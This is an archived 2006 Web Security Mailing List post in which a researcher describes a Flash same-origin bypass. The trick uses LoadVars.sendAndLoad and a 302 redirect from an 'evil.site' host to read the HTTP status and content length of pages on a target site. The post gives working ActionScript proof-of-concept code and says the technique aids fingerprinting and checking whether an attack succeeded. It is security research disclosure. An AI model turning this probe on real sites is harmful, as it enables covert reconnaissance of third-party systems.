[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond

From: "Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx>
Subject: Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond
Date: Thu, 03 Aug 2006 00:48:30 +0200

On 31 Jul 2006 at 15:30, Jeremiah Grossman wrote:

> 
> Hey, maybe! Thats why I posted the limitations, they just might cause  
> someone become interested. I don't have the test environment set up  
> to try it myself. Let us know what you find.
> 

Another cute thing which is possible with Flash is getting the explicit HTTP status code of 
a GET request, as well as the Content-Length (though I think the latter is only possible 
when the status is 200?). The trick is as following:

There's a method of the LoadVars class, called sendAndLoad. It can be used to send a 
request to a URL and receive the response data. However, it is of course severely limited 
by the "same host" Flash policy. That is, if you send a request to a URL whose host is 
different than the host the Flash movie is from, you cannot access any property of the 
response, including of course the response data. 

However, I noticed that there's an interesting exception. If the requested URL resides on 
the same host, yet it redirects to a second URL on a different host, then the response 
status and response Content-Length are made available (but not the body, alas...).

Here's the Flash code (assume http://www.evil.site/attack.swf):

var req:LoadVars=new LoadVars();
var resp:LoadVars=new LoadVars();
resp.onData=
	function(body:String)
	{
		// probably works only if the HTTP status is 200
		getURL("javascript:alert('length is: "+resp.getBytesTotal()+"');","_blank");
		// note that the data argument is undefined for URLs not in the same host
	};
resp.onHTTPStatus=
	function(httpStatus:Number)
	{
		getURL("javascript:alert('HTTP status is: "+httpStatus+"');","_blank");
	};
req.sendAndLoad("http://www.evil.site/redir.cgi",resp);

where http://www.evil.site/redir.cgi should redirect (via HTTP 302 redirection response) to 
http://www.target.site/some/path/to/page.ext?params

Knowing the response status and the response size may aid fingerprinting and even can tell 
whether an attack succeeded or not. 

Unfortunately, this doesn't help much with the basic authentication issue (not beyond the 
first Flash technique I described earlier in this thread) - if the authentication fails, a 
browser pop-up is displayed.

YMMV note: the above was tested with IE 6.0 and Flash 8.

Enjoy BH,
-Amit

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Follow-Ups:
- Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond
  - From: Amit Klein (AKsecurity)

Prev by Date: Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond
Next by Date: Re: [WEB SECURITY] Detecting, Analyzing, and Exploiting Intranet Applications using JavaScript
Previous by thread: Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond
Next by thread: Re: [WEB SECURITY] JavaScript Malware, port scanning, and beyond
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site